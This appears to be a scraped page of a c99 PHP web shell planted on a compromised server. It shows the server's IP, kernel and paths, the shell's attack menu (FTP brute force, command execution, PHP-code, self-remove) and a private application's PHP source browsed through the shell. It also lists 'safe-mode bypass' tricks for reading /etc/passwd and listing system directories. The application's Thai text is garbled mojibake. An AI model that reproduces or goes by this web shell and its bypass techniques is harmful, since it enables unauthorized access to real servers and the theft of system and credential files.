110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/directorBCNU/admin/ drwxr-xr-x Free 52.35 GB of 127.8 GB (40.96%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/manage/directorBCNU/admin/ drwxr-xr-x
Free 52.35 GB of 127.8 GB (40.96%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: showSendDocSignSR.php (4.14 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

<html>
<head>
<script language="javascript" src="../source/calendarDateInput.js"></script>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="../source/style.css" rel="stylesheet" type="text/css">
</head>
<body>
<table width="100%"  height="100%" border="0" align="center" cellpadding="0" cellspacing="1" >
  <tr bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_2"]; ?>" height=22> 
    <td align="left" colspan="3">&nbsp;ГТВЕРаНХВґЎТГКи§Л№С§КЧН</td>
  </tr>
  <? 	$oRs7->SearchByKey($oRs->DrsFromDrsID); $oRs7->GetRecord(); 
  			if($oRs7->DrsByPass!="Y"){ ?>
	  <tr> 
    <td width="31%"  bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>ЎТГєС№·ЦЎ<br>
      &nbsp;&nbsp;µиНа№ЧиН§</strong></td>
    <td width="1%"  align="center" ><strong>:</strong></td>
    <td width="68%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>" align="left"><? 	echo nl2br($oRs->DrsSign); ?>
	</td>
	</tr>
  <tr> 
    <td width="31%"  bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>јЩйЕ§№ТБ</strong></td>
    <td width="1%"  align="center" ><strong>:</strong></td>
    <td width="68%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>" align="center"> 
      <? $oPS6->SearchByKey($oRs->DrsPsIDCreate); $oPS6->GetRecord();   ?>
      <? echo "&nbsp;".GetPrefix($oPS6->prefixId).$oPS6->fName."&nbsp;".$oPS6->lName."<br>"; ?> 
      <? 	$oDlc6->SearchByKey($oRs->DrsDlcIDCreate); $oDlc6->GetRecord(); 			
	  			$oDlp2->SearchByKey($oDlc6->DlpID);  $oDlp2->GetRecord();
					echo "&nbsp;(".$oDlp2->DlpName.")<br>"; 
					list($DocD,$DocT) = split(' ',$oRs7->DrsSendDate);
				   echo abbreDate2($DocD,'/')."&nbsp;".a2th($DocT)."&nbsp;"; 			
		?>
      <br> <br></td>
  </tr>
  <? } ?>
  <tr height=22 > 
    <td width="31%"  bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>ЕСЎЙіРЛ№С§КЧН</strong></td>
    <td width="1%"  align="center" ><strong>:</strong></td>
    <td width="68%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>" align="left">&nbsp;&nbsp;&nbsp;&nbsp; 
      <select name="PtID">
        <option value="0">--аЕЧНЎЕСЎЙіРЛ№С§КЧН--</option>
        <? $oPt->RSProposeType();
					while($oPt->GetRecord()){
			  ?>
        <option value="<? echo $oPt->PtID; ?>" <?  if($PtID==""){   if($oRs->PtID==$oPt->PtID){  echo "selected"; }  }else{   if($PtID==$oPt->PtID){  echo "selected"; } }?>><? echo $oPt->PtName; ?></option>
        <? } ?>
      </select> </td>
  </tr>
  <tr height=40> 
    <td width="31%"  bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_1"]; ?>">&nbsp;&nbsp;<strong>јЩйєС№·ЦЎ/<br>
      &nbsp; јЩйКи§Л№С§КЧН</strong></td>
    <td width="1%"  align="center"><strong>:</strong></td>
    <td width="68%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_16"]; ?>" align="center"> 
      <? $oPS->SearchByKey($oDlc->personId); $oPS->GetRecord();   ?>
      <? echo "&nbsp;".GetPrefix($oPS->prefixId).$oPS->fName."&nbsp;".$oPS->lName."<br>"; ?> 
      <? 	$oDlp->SearchByKey($oDlc->DlpID);  $oDlp->GetRecord();
					echo "&nbsp;(".$oDlp->DlpName.")"; ?>
    </td>
  </tr>
  <tr> 
    <td colspan="3"><br> <fieldset>
      <legend>ЎУЛ№ґГРВРаЗЕТґУа№Ф№ЎТГ</legend>
      <table width="100%">
        <tr> 
          <td width="31%">&nbsp; <input name="checkDocSpeedDate" type="checkbox" value="Y" <? if($checkDocSpeedDate==""){ if($oRs->DrsDocDueDate !="0000-00-00"){   echo "checked"; }  }else{   if($checkDocSpeedDate=="Y"){ echo "checked"; } }?>> 
            <strong>АТВг№ЗС№·Хи </strong></td>
          <td width="69%"> 
            <?  if($DocSpeedLevelDueDate!=""){ ?>
            				<script>DateInput('DocSpeedLevelDueDate', true, 'DD/MM/YYYY','<?php echo $DocSpeedLevelDueDate;?>');</script> 
            <? }else{  
							if($oRs->DrsDocDueDate !="0000-00-00"){ ?>
								<script>DateInput('DocSpeedLevelDueDate', true, 'DD/MM/YYYY','<?php echo splitDateDb($oRs->DrsDocDueDate,"/");?>');</script> 
					<?	}else{?>
								<script>DateInput('DocSpeedLevelDueDate', true, 'DD/MM/YYYY','<?php echo getNowDateFw2();?>');</script> 
					<? 	 }
				   }
			 ?>
          </td>
        </tr>
      </table>
      </fieldset></td>
  </tr>
</table>
</body>
</html>

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0055 ]--